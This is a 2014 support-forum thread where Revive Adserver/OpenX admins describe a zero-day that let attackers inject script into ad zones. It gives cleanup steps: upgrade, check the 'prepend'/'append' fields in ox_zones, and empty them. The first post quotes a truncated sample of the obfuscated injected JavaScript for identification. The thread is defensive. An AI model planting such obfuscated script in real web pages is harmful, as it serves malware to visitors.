Hey_neken Posted January 2, 2014 Report Share Posted January 2, 2014 If someone is suffering alerts from Avast alerting about some trojan in the invocation code as shown on #224 ( https://github.com/revive-adserver/revive-adserver/issues/224 ) please do the following: - Upgrade to revive-adserver-3.0.2 ASAP. The bug is present on =<revive-adsever-3.0.1 and on OpenX (confirmed on 2.8.7 to 2.8.11). This won't fix the problem but will prevent more attacks. More info at: http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/- Look in 'ox_zones' table for any suspicious code. The code will be on the 'prepend' and 'append' fields. It will look something like:<script>try{$a=~[];$a={___:++$a,$$$$![]+\"\")[$a],__$:++$a,$_$_![]+\"\")[$a],_$_:++$a,$_$${}+\"\")[$a],$$_$$a[$a]+\"\")[$a],_$$:++$a,$$$_!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__{}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$ (...) - Empty those fields Quote Link to comment Share on other sites More sharing options...
mx_starter Posted January 2, 2014 Report Share Posted January 2, 2014 I can confirm this procedure, also. My investigation showed that the code is presented in the ox_auidit table, too. Will post a separate topic in a minute... Quote Link to comment Share on other sites More sharing options...
andrewatfornax Posted January 5, 2014 Report Share Posted January 5, 2014 For completeness, I think the separate topic suggested is http://forum.revive-adserver.com/topic/92-avast-detecting-trojan-in-the-openx-delivery/ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.